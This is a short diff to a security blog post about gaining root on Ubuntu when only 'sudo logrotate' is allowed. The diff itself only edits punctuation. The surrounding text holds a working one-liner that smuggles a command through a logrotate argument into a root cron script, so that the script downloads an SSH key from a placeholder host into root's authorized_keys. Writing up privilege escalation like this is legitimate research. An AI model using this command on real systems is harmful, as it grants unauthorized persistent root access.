MegaManSec/JoshuaHu/_posts/2023-10-01-gaining-root-with-logrotate-sudo-ubuntu.md

 user@server:/etc/cron.daily$ ./man-db
 Linux server 5.15.0-83-generic #92-Ubuntu SMP Mon Aug 14 09:30:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 ```
-The next time the cronjob runs, our arbitrary code is executed: as root!
+The next time the cronjob runs, our arbitrary code is executed: as root.

 ---

 So, to answer the question: with only the `sudo logrotate` command available, can we obtain root?
-Yep! it's as simple as:
+Yep; it's as simple as:
 ```bash
 sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget host/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'
 ```